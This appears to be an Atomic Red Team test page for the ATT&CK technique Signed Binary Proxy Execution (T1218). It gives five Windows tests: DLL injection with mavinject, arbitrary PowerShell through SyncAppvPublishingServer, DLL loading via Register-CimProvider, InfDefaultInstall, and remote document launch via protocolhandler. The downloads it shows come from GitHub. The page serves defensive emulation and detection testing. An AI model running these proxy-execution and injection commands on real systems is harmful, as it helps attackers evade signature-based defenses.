Try it using Invoke-Atomic

Signed Binary Proxy Execution

Description from ATT&CK

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split) https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - mavinject - Inject DLL into running process

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

Supported Platforms: windows

auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61

Inputs:

Name Description Type Default Value
process_id PID of process receiving injection string 1000
dll_payload DLL to inject Path PathToAtomicsFolder\T1218\src\x64\T1218.dll

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}

Dependencies: Run with powershell!

Description: T1218.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

1
2
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"

Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

Supported Platforms: windows

auto_generated_guid: d590097e-d402-44e2-ad72-2c6aa1ce78b1

Inputs:

Name Description Type Default Value
powershell_code PowerShell code to execute string Start-Process calc.exe

Attack Commands: Run with command_prompt!

1
2
SyncAppvPublishingServer.exe "n; #{powershell_code}"

Atomic Test #3 - Register-CimProvider - Execute evil dll

Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB

Supported Platforms: windows

auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655

Inputs:

Name Description Type Default Value
dll_payload DLL to execute Path PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll

Attack Commands: Run with command_prompt!

1
2
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}

Dependencies: Run with powershell!

Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

1
2
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"

Atomic Test #4 - InfDefaultInstall.exe .inf Execution

Test execution of a .inf using InfDefaultInstall.exe

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

Supported Platforms: windows

auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef

Inputs:

Name Description Type Default Value
inf_to_execute Local location of inf file string PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf

Attack Commands: Run with command_prompt!

1
2
InfDefaultInstall.exe #{inf_to_execute}

Dependencies: Run with powershell!

Description: INF file must exist on disk at specified location (#{inf_to_execute})

Check Prereq Commands:

1
2
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"

Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File

Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.

Supported Platforms: windows

auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2

Inputs:

Name Description Type Default Value
microsoft_wordpath path to office folder path C:\Program Files\Microsoft Office\Office16
remote_url url to document url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx

Attack Commands: Run with command_prompt!

1
2
#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"

Dependencies: Run with powershell!

Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided

Check Prereq Commands:

1
2
if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1}

Get Prereq Commands:

1
2
write-host "Install Microsoft Word or provide correct path."

source